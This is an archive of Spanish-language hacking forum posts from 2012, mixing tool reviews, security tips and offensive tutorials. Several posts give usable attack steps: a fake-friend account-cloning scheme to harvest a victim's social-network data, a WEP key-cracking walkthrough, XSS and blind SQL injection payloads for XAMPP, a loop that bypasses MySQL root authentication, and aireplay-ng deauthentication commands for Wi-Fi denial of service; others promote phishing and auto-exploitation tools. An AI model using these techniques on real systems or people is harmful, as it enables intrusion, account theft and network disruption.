Normalmente, primero se crea una nueva cuenta en blanco para probar. A continuación, el plugin 'friending' añade todos los amigos de la víctima (para tener algunos amigos comunes). Entonces el complemento clonar nos pedirá que elijamos a uno de los amigos de la víctima. Este plugin de clonación sólo copia la imagen y el nombre para mostrar del amigo de la víctima elegida y lo configura para la cuenta autenticada. Después, se envía una solicitud de amigo a la cuenta de la víctima. Un dumper espera a que la víctima acepte la solicitud de amigo para empezar a guardar todas las páginas HTML accesibles (información, imágenes, etiquetas, etc ...) para un posterior análisis.

Después de unos minutos, puede que la víctima se percate de que la cuenta es falsa y la elimine de su lista de amigos, ¡pero es probable que sea demasiado tarde!


WebSite: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#67
Seguridad Wireless / Hacking Wireless en Windows
Julio 07, 2012, 02:48:01 PM
Programas a utilizar:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -> CommView for WiFi
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -> Aircrack-ng 1.1 para Windows

Ahora estamos listos para empezar, instalamos CommView con nuestro driver correspondiente, a veces es un poco complicado este paso, Google y YouTube te ayudaran!
Una vez abierto nos vamos a "Logging" y cambiamos

"Maximum directory size, MBytes" a 50000
"Average log file size, MBytes" a 100
"Save logs to" a la carpeta que nosotros deseemos


Una vez hecho esto, nos vamos al botón más grande (Play) el cual abre una ventana llamada "Scanner" entonces hacemos clic en "Start Scanning" esperamos un rato a que realice el escáner por todos los canales.


Dejamos que capture bastantes paquetes de el canal 1 que es en el que está situado nuestra propia red, como no tenemos prisa, lo podemos dejar un rato.

NOTA: Si hay mas señal de red va mas rápido capturando paquetes, así, que si os podéis acercar mucho mejor!
Cuando han pasado 7 minutos vemos que ya ha capturado suficientes paquetes (78.902) hacemos clic en "Stop" automáticamente se guardan en la carpeta que hemos especificado anteriormente, en mi caso "D:\Projects\WIFI KEYS\Files"


Abrimos D:\Projects\WIFI KEYS\Files y vemos que se ha creado un archivo con el día de hoy y la hora


Al ejecutarlo, se nos abre CommView for Wifi hacemos clic en Archivo>Exportar Logs>WireShark/TcpDump Format y lo guardamos con la extensión .cap



Una vez guardado, nos vamos a aircrack-ng 1.1 para windows, en mi caso ya lo he desempaquetado y dentro de la carpeta, abrimos la carpeta "bin" y ejecutamos el archivo "Aircrack-ng GUI.exe"


Una vez abierto escogemos el archivo .cap que anteriormente habíamos guardado, seleccionamos "key size=64″ y "Launch", si falla por este motivo subid del key size a 128.


Entonces no pide que red queremos escoger, y le decimos que la 1ra en la lista:


Entonces dejamos que haga su trabajo.


¿¿Pero qué ha ocurrido??


No hemos esperado el tiempo necesario para que capturara suficientes paquetes (en CommView) como para conseguir la clave, entonces lo que haremos será repetir el procedimiento de captura desde los pasos anteriores hasta llegar otra vez aquí hasta que no nos diga que faltan paquetes.


Ya esta hemos encontrado la clave: C2:40:6C:54:FA ahora solo hemos de quitar los puntos y listo!
KEY: C2406C54FA
NOTA: Esta WiFi es propia así que no se ha hecho nada ilegal!
Aunque parezca largo, es un proceso que puedes realizar en pocos minutos si has hecho una buena captura de paquetes. La verdad es que se puede simplificar en pocos pasos:

Abrir "CommView for WiFi"
Escanear Wifis > Capturar canal
Capturar paquetes del canal
Ir a la carpeta especificada, abrir el archivo generado.
Archivo>Exportar Registros>Wireshark, guardar con extension .cap
Abrir Aircrack-ng Gui.exe dentro de la carpeta bin
Buscar los archivos anteriormente guardados y seleccionarlos (extension .cap)
¡Y ya tenemos la clave!

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#68
Seguridad Wireless / DroidSheep (sidejacking)
Julio 07, 2012, 02:34:58 PM

DroidSheep es una sencilla herramienta de Android para el secuestro de sesión Web (sidejacking). Se escucha paquetes HTTP enviados a través de una conexión de red inalámbrica (802.11) y extrae el identificador de sesión a partir de estos paquetes con el fin de reutilizarlos.

DroidSheep puede capturar sesiones utilizando la biblioteca libpcap y soportes: redes WEP abierto redes encriptadas con WPA y WPA2 (PSK redes cifradas solamente)

DroidSheep no está diseñado para robar identidades o cualquiera endamage, sino para mostrar la debilidad de la seguridad de la no-ssl servicios web.


Este software utiliza libpcap y arpspoof.

WebSite: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#69
Hacking / Maltego (Recolector de Informacion)
Julio 07, 2012, 02:15:57 PM

Maltego es una aplicación de minería y recolección de información utilizada durante la fase de 'Data Gathering', proceso en el cual se trata de obtener el mayor número de información posible sobre un objetivo para su posterior ataque.

Antes de empezar a utilizar Maltego, es necesario registrarse en la web, ya que cuando se inicie Maltego por primera vez, nos pedirá que introduzcamos nuestra cuenta de usuario a través de un asistente. Si no realizamos estos pasos, no se nos cargará la paleta de entidades, por lo que no podremos utilizar adecuadamente el software.

Para iniciar un nuevo proyecto (Graph), se debe hacer clic sobre el icono marcado en la siguiente captura de pantalla.


En el lateral izquierdo de la interfaz, se encuentra un panel con la paleta de componentes. Para agregar una entidad desde esta paleta, basta con arrastrarlo al 'Graph'. En la siguiente captura se ve como se ha agregado una entidad 'Domain'.

Si hacemos clic sobre la entidad una vez agregada, en el lateral derecho se nos mostrará el panel de propiedades, pudiendo personalizar y modificar las propiedades del mismo. Para este ejemplo se ha configurado la propiedad 'Domain Name' como 'fbi.gov'.


Para iniciar el proceso de minería de datos, hay que comenzar con la recogida de información sobre una entidad. Para ello es necesario hacer clic derecho sobre la misma, y expandir el menú 'Run transform', donde aparecerá una lista con las distintas transformaciones aplicables a dicha entidad.

Si dejamos el puntero del ratón situado encima de una de ellas, se nos mostrará una pequeña descripción sobre ella.

Una vez se inicie la búsqueda, se irá pintando el mapa de los datos obtenidos. Dicho mapa será representado mediante diferentes iconos dependiendo del tipo de entidad de que se trate. Por supuesto, cada una dispondrá de sus propias transformaciones.


Una vez se aplique la transformación, se inicirá la búsqueda, y a medida que esta se ejecuta y devuelve resultados, se irá pintando el mapa con los datos obtenidos. Dicho mapa será representado mediante diferentes iconos dependiendo del tipo de entidad que se trate, y cada una dispondrá, por tanto, de sus propias transformaciones.


Una parte importante, a la hora de realizar un proceso de 'Data Gathering', es la identificación de los usuarios de la organización objetivo. Dicha información puede resultar de gran utilidad a la hora de realizar ataques, ya sean bien de ingeniería social, o bien datos que se utilicen para la generación de diccionarios de usuarios, creando de este modo una lista de usuarios válidos en la organización.

Con este objetivo existe una transformación llamada 'Email Addresses from Domain -> All in this set', que intenta obtener un mapa similar al que se puede ver en la siguiente imagen:


Con todas estas direcciones de correos se puede obtener más información, como por ejemplo obtener los dominios en los cuales ha sido encontradas referencias a una dirección de correo concreta. Esto puede encontrar foros, relaciones de comunicación entre empresas, datos publicados en blogs, frecuencias de visita de usuarios, etc... para la realizacion de ataques dirigidos.

En este caso, para probar esta transformación se realizará una búsqueda sobre la dirección de correo '[email protected]', usando la transformación 'Other transformation -> To Website'.


Como se puede ver en la imagen 6, esta cuenta aparece relacionada con distintos servidores web.

En casos en los que se conozca información extra que Maltego ha sido incapaz de encontrar o relacionar, podemos hacer esto manualmente. Si por ejemplo se supiera de la existencia de la cuenta 'usuario @fbi.gov', se puede agregar manualmente arrastrando la entidad 'Email Address' y, posteriormente, creando un enlace con el dominio, símplemente arrastrando desde la entidad dominio hacia la dirección de correo.


Otra de las funcionalidades de Maltego es la extracción de metadatos de los documentos ofimáticos. Para ello, primero es necesaria la localización de dichos documentos mediante la transformación 'Files and Documents from Domain -> To Files (Office)', en este caso realizado sobre el dominio 'usal.es'.


Para la extracción de metadatos, utilizar la transformación 'Other transforms -> Parse meta information' sobre los documentos ofimáticos, obteniendo así los datos.


Una vez está realizada la extracción y relación de datos, es posible visualizarla de diversas formas graficas (Mining view, Dynamic View, Edge Weighter View) o en modo texto (Entity List), seleccionando el tipo en la parte superior del gráfico.


Como se ha podido ver en este artículo, Maltego es una herramienta perfecta para hacer Data Gathering usando repositorios de conocimiento gratuitos en Internet. Una herramienta perfecta para acompañar cualquier proceso de pentesting en la fase de footprinting o fingerprinting e, incluso, cuando se quiera ir a hacer un ataque dirigido en la de exploiting.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Maltego Web Site: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#70
Seguridad Wireless / Virtual WiFi
Junio 27, 2012, 11:41:49 AM
En muchas ocasiones llegamos a lugares en los cuales la conexión a internet se da de manera cableada y nos encontramos con el problema de que solo hay un puerto de conexión y necesitamos dar conexión a varios PC y no tenemos un Switches, un AP o cualquier dispositivo destinado para compartir conexiones. Esto es más común de lo que creemos, pero afortunadamente hay una manera fácil y sencilla de solucionar este inconveniente, se trata de Virtual WiFi, una característica que se ha incorporado en el sistema operativo Windows 7, la cual nos permite convertir nuestra tarjeta de red inalámbrica en un AP para compartir la conexión a internet de otra interfaz de nuestro PC, solo depende de que nuestra tarjeta de red inalámbrica soporte ésta característica.

Primero que todo, debemos saber si nuestra tarjeta de red inalámbrica soporta esta característica

1.- tenemos que abrir la consola con privilegios de administrado y escribir los siguientes comandos:

Código: php
netsh wlan set hosednetwork mode=allow ssid=underc0de key=Aryenal keyUsage=persistent
netsh wlan start hostednetwork




*Los parámetros ssid y Key son los del nombre de la red inalámbrica y el password de acceso respectivamente. asi que cada uno le pone el ssid y key que desea.
*el parametro start inicia el adaptador

2.- Si deseamos también compartir Internet, debemos activar una opción en nuestro adaptador que esta conectado a Internet.



y acá les dejo las opciones de los parámetros y ejemplos que pueden utilizar.


Para ver la confguración de la red y los usuarios conectados: netsh wlan show hostednetworkSaludos
Para ver la configuracion de seguridad de la red, incluyendo la clave de conexión y la seguridad, que es WPA2-CCMP (AES):
netsh wlan show hostednetwork security
Para detener el adaptador virtual: netsh wlan stop hostednetwork

Saludos. 8)

#71
Hacking / Cocoa Packet Analyzer 1.11
Junio 22, 2012, 06:52:09 PM

Cocoa Packet Analyzer es un sniffer nativo para Mac OS X (>10.5) que desde noviembre de 2011 se encuentra en su versión 1.11.  Entre sus características permite leer y escribir ficheros en PCAP, lo que realmente no es ninguna novedad, y algunos protocolos básicos de TCP/IP.

Adicionalmente es mejorado mediante plugins, de los que hay disponibles tan solo dos: SIP y IAX2

Al arrancarlo permite leer de un fichero un captura o crear una nueva, indicando el interfaz por el que realizar la escucha.


Cuando termina (y no en tiempo real), muestra los resultados en una ventana similar a Wireshark. Aunque como se puede ver en la siguiente captura de pantalla, no permite seguir el flujo de una conexión, ni entiende protocolos de capa 7.


Pese a que visualmente se agradece que esté desarrollado nativamente, las funcionalidades son extremadamente limitadas. Aun está demasiado verde como para plantearse sustituir otros sniffers mucho más avanzados como Wireshark o incluso el propio tcpdump.

Esperemos que continúen ampliandolo y ya veremos dentro de un tiempo si está algo más maduro.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#72

Como sabemos XAMPP es un servidor de plataforma independiente, software libre, que consiste principalmente en una base de datos MySQL, el servidor web Apache y los intérpretes para lenguajes de script: PHP y Perl, perfecto para una rápida instalación de un mini-servidor en nuestro localhost. Recientemente en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta han subido un paper con 2 XSS y 1 Blind SQL Injection...

La versión afectada es XAMPP Windows 1.7.7, y como justamente lo tengo instalado (es la última versión oficial de XAMPP) fue que probé los bugs... Y en efecto era vulnerable:

Vulnerabilidades XSS:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"<script>alert("XSS")</script>
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Este de arriba, todavía no se arregla desde la versión 1.7.4

Blind SQL Injection:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta and sleep(1) &titel=555-666-0606

Como dije arriba, XAMPP Windows 1.7.7 es la útlima versión oficial, así que la recomendación es que esperes la actualización y que lo desactives si tienes mucha información de importancia.

Fuente: [Blackploit]
#73
Hacking / Vulnerabilidad grave en MySQL/MariaDB
Junio 13, 2012, 01:04:56 AM
El sábado 9 de Junio  Sergei Golubchik, coordinador de seguridad de MariaDB publicaba un post en la lista OSS-SEC sobre una grave vulnerabilidad que afectaba a diferentes versiones de MySQL y MariaDB.

Se evidencia la posibilidad de autenticarse como usuario con máximos privilegios (root) únicamente realizando conexiones simultáneas, con CUALQUIER contraseña introducida como parámetro y contra un servidor vulnerable. Al cabo de un número indeterminado de intentos fallidos, el servidor aceptará la conexión y se realizará la autenticación de forma satisfactoria. Sin más. Sin shellcodes raras, sin casuísticas extrañas: únicamente tenemos que tener delante un servidor vulnerable, que cumpla con las siguientes versiones:

Son vulnerables todas las versiones de MariaDB y MySQL hasta la 5.1.61, 5.2.11, 5.3.5 y 5.5.22
NO SON vulnerables las versiones de MySQL 5.1.63, 5.5.24 y 5.6.6
NO SON vulnerables las versiones de MariaDB 5.1.62, 5.2.12, 5.3.6 y 5.5.23

Con la siguiente línea en shell script, teniendo instalada una base de datos vulnerable en el sistema local, y contando con el cliente 'mysql', se podría realizar una autenticación como usuario root sin conocer la contraseña:

Código: php
for i in `seq 1 1000`; do mysql -u root --password=blablabla -h 127.0.0.1 2>/dev/null; done


Básicamente, se ejecutará la sentencia de autenticación mediante cliente por consola (comando mysql) como usuario root (-u root) y cualquier contraseña (--password=blablabla) contra el servidor vulnerable  presente en el mismo sistema donde se ejecuta este script (-h 127.0.0.1), sin mostrar ningún mensaje de error por pantalla (2>/dev/null).

Vamos a ver el ejemplo real. Las siguientes pruebas se han realizado sobre una Fedora Core 16, con MySQL versión 5.5.21:


En primer lugar, y para este ejemplo, cambiaremos la contraseña original de MySQL para el usuario root, que antes la teníamos establecida a 'password', para que ahora sea 'SuperPassWordDeLaMuerte':


Seguidamente, salimos de la sesión de root, y nos quedamos como usuario sin privilegios, y ejecutamos la secuencia anterior, que realizará conexiones como usuario root y cualquier contraseña, programando un total de 1000 intentos. A continuación se ejecutará la consola de mysql satisfactoriamente:


Obviamente, este "ataque" ya se encuentra integrado como exploit de Metasploit Framework, permitiendo además el volcado de hashes de todos los usuarios, todo ello con el módulo mysql_authbypass_hashdump:


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#74
Seguridad Wireless / PwnSTAR
Junio 10, 2012, 06:06:51 PM
Es un script bash para lanzar un suave AP, puede configurar con una amplia variedad de opciones de ataque. Incluye una serie de index.html y el servidor de scripts php, puede actuar como multi-cliente de portal cautivo con php y iptables. Lanza hazañas clásicas como el mal-PDF.


Va a hacer mucho más que la base aérea de lanzamiento-ng:

- gestión de las interfaces y MACspoofing
- configurar olfateando
- servir a las páginas web de phishing o malicioso
- poner en marcha karmetasploit
- apoderarse de apretones de manos WPA
- de-auth clientes
- gestión de IPtables

Característica de Actualización de lista:

- en cautividad portal con iptables y php
- secuencias de comandos más de PHP
- hazañas añadido

Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#75
1.- INHIBIDOR: Un Inhibidor de Señales Wifi es auqella herramienta fisica cuyo fin es la de hacer nulas las conexiones en una determinada Zona.

VEREMOS ALGUNOS INHIBIDORES PARA SEÑALES WIFI:





sin duda tienen muy buena pinta y son muy discretos.
Pag:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2.-DoS

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

* ponemos nuestra tarjeta en modo monitor.
Código: php
airmon-ng start wlan0


* Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico.
Código: php
airmon-ng -c 5 mon0


Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

* DoS al punto de acceso:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
Código: php
aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0


Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

* DoS al Cliente:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.
Código: php
aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0


Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:

tambien puedes realizar algo similar con mdk3 que esta por defecto en bakctrack 5r3 y kali linux

Fuentes: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
(modificado por aika falta del script)
#76

¿QUÉ ES TrueCrack?
TrueCrack es una galleta de la contraseña por fuerza bruta para los archivos de volumen TrueCrypt (Copyrigth). Funciona en Linux y que se ha optimizado con la tecnología NVIDIA CUDA.
Se trabaja con volúmenes cripted con los siguientes algoritmos:

PBKDF2 (definido en PKCS5 v2.0) con base en función de derivación de RIPEMD160 Key.
Bloque de modo de cifrado XTS de la operación utilizada para el cifrado de disco duro basado en AES.


TrueCrack puede funcionar en dos modos diferentes de uso:

El ataque del diccionario: leer las contraseñas desde un archivo de palabras (una contraseña para la línea).
Ataque Charset: generar las contraseñas de un juego de caracteres de los símbolos definidos por el usuario (por ejemplo: todas las cadenas posibles de n caracteres desde el juego de caracteres "abc").


Cómo ejecutar?

Diccionario ataque de un archivo de lista de palabras:

. / Truecrack-t-w TRUECRYPT_VOLUME WORDLIST_FILE-b 1024
Charset ataque de un alfabeto (por ejemplo, ABC) con la longitud máxima (32) para la palabra:
. / Truecrack-t TRUECRYPT_VOLUME-c abc-m 32-b 1024

OPCIONES DE EJECUCIÓN:

Nota: el argumento de bloque es directamente proporcional al número de bloques de la cuadrícula cuda paralelas y el número de contraseña calculada. Un valor de 10 a de bloque de parámetro significa que hay 10 bloques de cuda que se ejecutan en paralelo, cada bloque comprueba y verifica una sola contraseña. Así que 10 bloques de 10 significa que la contraseña calcula en paralelo. Este valor se establece por defecto para el número de núcleos de la actual junta directiva de nvidia (el máximo es de 65.536 para la 1.xy 2.x arquitecturas CUDA), si la GPU es desactivar, de bloque se establece en 1024 por defecto.


Cómo compilar?

TrueCrack puede trabajar en la CPU o la GPU modos.
Si desea que la optimización de Cuda, se establece la variable de la GPU en la verdad:
que la GPU = true
Porque si usted desea utilizar sólo el recurso de la CPU, se establece la variable de la GPU en falso:
que la GPU = false
Asegúrese de que ha realizado correctamente instalar y configurar nvidia cuda marco de su sistema. Usted puede encontrar una breve guía en la sección de descargas.

RENDIMIENTO:

Tiempo total de ejecución de un ataque de diccionario de 10.000 palabras con una longitud media de palabra: 10 caracteres.
CPU en Modo de:

-> Sistema: Intel Core i7-920, 2,67 GHz
-> Tiempo total: 11m 01,1 s

GPU modo de:

-> Consejo: nVidia GeForce GTX470
-> Tiempo total: 0m 30.425 s

LICENCIA:

TrueCrack es un software de código abierto bajo GNU Public License versión 3. Este software está basado en TrueCrypt, disponible gratuitamente en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#77
Seguridad Wireless / Analizadores de señales Wifi
Mayo 30, 2012, 09:01:24 PM
Muchas veces, nos vemos en la necesidad de emplear uno o más programas para analizar una red inalámbrica, una red cableada o una mezcla de ambas pero, dónde los bajo, cómo se usan, como se configuran, para que sirve cada uno, cuál es el más apropiado? En este artículo, les vamos a explicar el uso y configuración de los programas y herramientas más usados para trabajar en redes cableadas y en redes WiFi, tanto en 2,4 Ghz como en 5,8 Ghz. Primero que nada, les presentamos un breve listado de los programas más usados y sus correspondientes links de descarga:

Network Stumbler: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
inSSIDer: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Xirrus Wi-Fi Inspector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
WiFi Radar: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
LanHelper: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lan-Explorer: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Comencemos con los programas wireless!

Antes sería bueno aclarar varios puntos:

No siempre es posible utilizar la tarjeta WiFi para escanear y a la vez estar conectados a internet o a alguna red. Estos programas son presentados a modo de sugerencia, no son herramientas profesionales ni similares. Si bien nos proporcionan una cantidad muy importante de información, ésta no siempre es exacta o válida para tomar como referencia absoluta. Confiamos en el buen uso que le puedan dar a estos programas.

NetStumbler

Este programa nos permite escanear de forma muy rápida el espectro WiFI, para ver que redes tenemos cerca, que señal tienen, la relación señal-ruido, la velocidad, el canal y hasta la marca de los equipos. También nos permite hacer un análisis de cada red inalámbrica, verificando mediante una gráfica, el tráfico y uso del canal en todo momento.


Dentro de lo más destacable de este programa, resaltamos su velocidad, ya que dependiendo de nuestra tarjeta WiFi (incorporada, USB, PCMCIA, PCI, etc), este software realiza un rápido escaneo y nos muestra en tiempo real cada una de las redes detectadas y un montón de información, también nos permite conectar nuestro GPS y grabar la latitud y longitud del lugar que escaneamos. Así mismo, podemos hacer un escaneo por canal, lo que nos permite "ver" el tráfico y ocupación del mismo y así poder elegir entre usarlo o no.


Entre sus contras, está el hecho de que sólo funciona en Windows XP. Si bien se sabe de gente que lo trabaja en otras versiones de Windows y/o en Linux, mediante máquinas virtuales, el software en sí, está diseñado para trabajar en XP. También hay una versión para Pocket PC y la pueden descargar de aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


inSSIDer.

inSSIDer es un programa de escaneo, muy similar al NetStumbler, pero que además, nos realiza una especia de análisis de espectro de muy buena calidad y en tiempo real, (esto nos ahorra un montón de dinero en equipos para tal función). También nos genera gráficas de tráfico, de uso de canal y de señal. Este software, se desarrolló por parte de la gente de MetaGeek (los creadores de Wi-Spy), como una herramienta alternativa a su pequeño y afamado analizador de espectro.



Lo más destacable de inSSIDer, es su velocidad y lo sencillo de su uso, ya que una vez descargado e instalado, solo tenemos que ejecutarlo, seleccionamos la tarjeta de red WiFi que vamos a emplear y hacemos click en Iniciar Escaneo. Casi en forma instantánea, nos mostrará las redes inalámbricas dentro de nuestro alcance y los datos más relevantes de cada una de ellas, más abajo, nos mostrará (en 2 ventanas), una gráfica de señal y un análisis de espectro. Dentro de sus ventajas, encontramos que el software está en español, y es compatible con Windows XP, Vista y Windows 7, (tanto en 32 como en 64Bit). Nos permite crear grupos según Mac, SSID, Canal, RSSI, etc. También es compatible con los GPS más comunes (NMEA versiones 2.3 y superiores), y nos permite exportar datos de WiFi y GPS a un archivo KML para verlo en Google Earth. Entre sus desventajas, notamos que es un poco pesado a la hora de ejecutarlo y muy cada tanto realiza algún pequeño bug que nos obliga a reiniciar el programa.

Xirrus Wi-Fi Inspector

Xirrus es un programa de escaneo, no tan bonito como los anteriores, pero igual de efectivo. Es muy rápido a la hora de escanear y detectar redes wireless, nos presenta muchos datos de cada una de ellas y la posibilidad de graficar un "histórico" de la señal de cada red. También incorpora una especie de "radar" y "sonar", que nos permite localizar dónde se encuentran las redes detectadas.


Es muy sencillo de usar y es compatible con Windows XP, Windows Vista y Windows 7. También podemos usar una pequeña herramienta basada en Xirrus, que funciona como un mini-monitor, y hay descargas disponibles para XP, Vista, Linux y OS.

WiFi Radar

Existen varias aplicaciones para configurar tu red inalámbrica en Linux, una de ellas es WiFi Radar. Como se baja y/o instala?
Fácil, simplemente tecleamos en la consola: sudo apt-get install wifi-radar. También pueden descargarla para su aplicación preferida, Gentoo, Debian, Ubuntu o SuSE.


Lo más destacable de esta aplicación, es que gestiona gráficamente tus conexiones y genera perfiles para cada una de ellas, de tal manera de que si configuras una conexión, no tendrás que configurarla de nuevo, lo que permite que al detectar redes inalámbricas se conecte automáticamente. Esta aplicación se integra muy bien con el escritorio de gnome, y existen unas muy buenas opciones para KDE.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#78
Seguridad / Configurar GMail de forma segura
Mayo 30, 2012, 07:38:39 PM
Cada vez dependemos más de los servicios de Google, yo por ejemplo lo uso para muchas cosas correo, YouTube, calendario, almacenamiento, documentos colaborativos, publicidad, estadísticas y un largo etc., si a esto le sumamos que con las cuentas de Google nos podemos autenticar en una gran cantidad de servicios web gracias que forman parte de OpenID, nos podemos hacer una idea de lo que puede pasar si perdemos acceso a nuestra cuenta Google.


En la comunidad ya hemos dado algunas pautas para configurar adecuadamente Gmail por ejemplo para forzar conexiones HTTPS o ponerla por defecto en GMail pero la finalidad de esta entrada es explicarte como configurar adecuadamente una nueva funcionalidad de Gmail llamada verificación de dos pasos... pero ¿qué es la verificación de dos pasos? el siguiente video de presentación explica esta nueva funcionalidad: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En resumen la verificación de dos pasos nos permite aumentar una capa mas de seguridad en nuestra cuenta de Google, utilizando nuestro teléfono móvil como un token de seguridad, de esta forma si capturan nuestra clave no podrán hacer nada con ella a no ser que consigan también nuestro teléfono o token. Lo primero que debemos hacer para configurar nuestro Gmail o Cuenta Google de forma segura es ingresar a ella y hacer click en nuestro avatar, se te abrirá un cuadro donde podremos acceder a la "Configuración de cuenta".


Una vez en la cuenta hacemos click en en la opción "Editar" del apartado "Verificación en dos pasos"


Luego simplemente damos al botón "Iniciar configuración"


Después ingresas tu país y el numero de teléfono y seleccionas por que medio quieres recibir el código de acceso, yo elegí la "llamada de voz", por que el envío de "Mensaje de texto SMS" siempre tardaba mas de un minuto y la llamada solo unos segundos, pero tu puedes intentar la opción del mensaje a ver si se demora menos, ingresamos el código que nos envían por cualquiera de los medios y damos al botón "Siguiente".


Si estas haciendo este proceso desde un equipo de confianza (recomendado) puedes darle "Confiar en este ordenador".


Finalmente damos al botón rojo "ACTIVAR VERIFICACIÓN EN DOS PASOS".


Con estos pasos ya tenemos activa la verificación en dos pasos de Google, pero adicional podemos imprimir códigos de seguridad con la opción "Mostrar códigos de seguridad" , útiles por ejemplo cuando no tenemos señal en el teléfono o nos encontramos fuera del país, también podemos "Añadir un numero de teléfono" por si algún día perdemos nuestro dispositivo tener otra numero al que puedan enviarnos el código de acceso, debes elegir muy bien este numero alternativo, recomiendo un familiar (no le cuentes si no es necesario) y no tu pareja ya que si alguna día el o ella quiere tener acceso a tu cuenta, será mucho mas sencillo conseguirlo, por ultimo tenemos la posibilidad de tener un generador de códigos en nuestro teléfono (disponible para Android, iPhone y BlackBerry) para no depender de la señal telefónica o internet para acceder a nuestra cuenta.


Por ejemplo si deseamos utilizar nuestro iPhone como token de seguridad sin tener ninguna conectividad, solo debemos instalar la aplicación Google Authenticator escanear el código QR que aparece en pantalla y poner el código que arroja la aplicación y listo.


Algunas aplicaciones (clientes de correo, lectores RSS, etc..) no soportan la autenticación de dos pasos, por eso es posible generar contraseñas especificas para esas aplicaciones utilizando la herramienta "Administrar contraseñas especificas de aplicaciones".


Luego simplemente le damos un nombre que nos recuerde la aplicación a la que le pondremos esa clave y la damos "Generar contraseña".


Automáticamente nos generará una contraseña única y segura para esa aplicación, esta contraseña no puede ser utilizada desde un navegador, y si se generan 2 conexión al tiempo nos llegara un correo notificándonos, por eso es necesario generar una contraseña diferente para cada aplicación que requiera acceder a nuestros datos de google.


Si todo ha salido bien, ahora cada que quieras entrar desde un equipo que no sea de confianza te aparecerá el siguiente pantallazo pidiendo el código de acceso, el cual podemos sacar de la aplicación instalada en nuestro teléfono, de la copia impresa que sacamos, con una llamada o por mensaje de texto.


Espero que este texto te sea de utilidad y sobre todo que apliques estos pasos en tu cuenta gmail, sobretodo si dependes mucho de ella.
#79
winAUTOPWN es una herramienta que nos permite automatizar ataques a entornos Windows, de forma simple y con un solo click.


El funcionamiento de winAUTOPWN no es complicado, primero escanea los puertos del puerto 1 al 65535 en busca de servicios activos en el sistema, si encuentra algún servicio, busca en su base de datos algún exploit para ese servicio e intenta explotarlo y si el ataque tiene éxito nos entrega una shell del sistema.

Además de lo antes mencionado (que no es poco), winAUTOPWN nos ofrece las siguientes características:

-> El escaneo de puertos es multi hilo (con el aumento en velocidad que esto representa)
-> No se basa en el banner arrojado por el servicio (para evitar ser engañado por este)
-> Incluye los exploits en binario para una gran cantidad de vulnerabilidades.
-> Los invito a probar esta herramienta que se actualiza constantemente y puede ahorrarnos mucho tiempo, si necesitamos testear la
-> seguridad de muchas maquinas Windows.

En esta nueva versión se han integrado muchas mejoras como la interface intuitiva, Exploits de DoS, Ataques del lado del Cliente, Actualizaciones tempranas y auto instalador de dependencias que el desarrollador ha querido incluir solo en una versión "profesional" de la herramienta, pero siempre dejando el tradicional winAUTOPWN por consola para la comunidad, ya que me ha servido en varias ocasiones el winAUTOPWN he realizado una pequeña donación al autor por medio de su cuenta flattr, si ha sido de utilidad para ti, recomiendo que lo hagas también.

ADVERTENCIA, winAUTOPWN incluye exploits compilados que pueden ser detectados por tu software antivirus como malware o virus, pero es por la naturaleza misma de la aplicación; USALA BAJO TU PROPIA RESPONSABILIDAD

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - subido por baron.power
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#80
En el día de ayer pudimos ver incontables noticias y artículos acerca de un nuevo malware, llamado Flame/Flamer/SkyWiper, con una sofisticación técnica que incluso supera a Stuxnet o DuQu y que, igualmente, había afectado a países de oriente medio.

Aparentemente, el troyano tiene como misión labores de inteligencia, y parece que está orientado a países de oriente medio.

Con este post simplemente quiero hacer una recopilación de todos los datos que se han ido dando (muchos de ellos sin confirmar) para poder tener una visión más completa del asunto.

El troyano es bastante complejo (se han detectado hasta cinco tipos de cifrado, unos más robustos que otros, p.e boot32drv.sys hace un XOR con 0xFF) y si a eso añadimos la ofuscación del código, se estima que el estudio y comprensión de Flame les va a llevar años a las casas de antivirus.

